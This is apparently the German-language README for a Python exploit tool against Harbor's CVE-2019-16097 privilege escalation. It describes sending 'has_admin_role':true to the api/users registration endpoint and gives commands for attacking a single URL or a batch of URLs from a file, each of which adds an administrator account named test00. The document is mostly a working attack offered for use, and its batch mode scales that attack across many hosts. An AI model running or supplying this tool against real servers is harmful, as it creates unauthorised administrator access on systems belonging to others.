
harbor(<1.7.6/1.8.3) Privilegieneskalation (CVE-2019-16097)
Im September 2019 wurde in Harbor eine Schwachstelle bekannt, die über die Registrierungsfunktion das Hinzufügen eines Administrators ermöglicht. Über die Registrierungsschnittstelle api/users und den POST-Parameter "has_admin_role":true kann direkt ein Administrator hinzugefügt werden.
Dieses Tool unterstützt die Prüfung einzelner URLs oder die Stapelprüfung.
python2.7
pip install requests
Verwendungshilfe: python harbor-give-me-admin.py -h

Einzel-URL-Prüfung: python harbor-give-me-admin.py -u "https://www.xxx.com/"
//Bei erfolgreicher Ausnutzung wird das Administratorkonto test00 hinzugefügt, Vorsicht!

Batch-Prüfung: python harbor-give-me-admin.py -f urls,txt
//Bei erfolgreicher Ausnutzung wird das Administratorkonto test00 hinzugefügt, Vorsicht!
gmail:[email protected]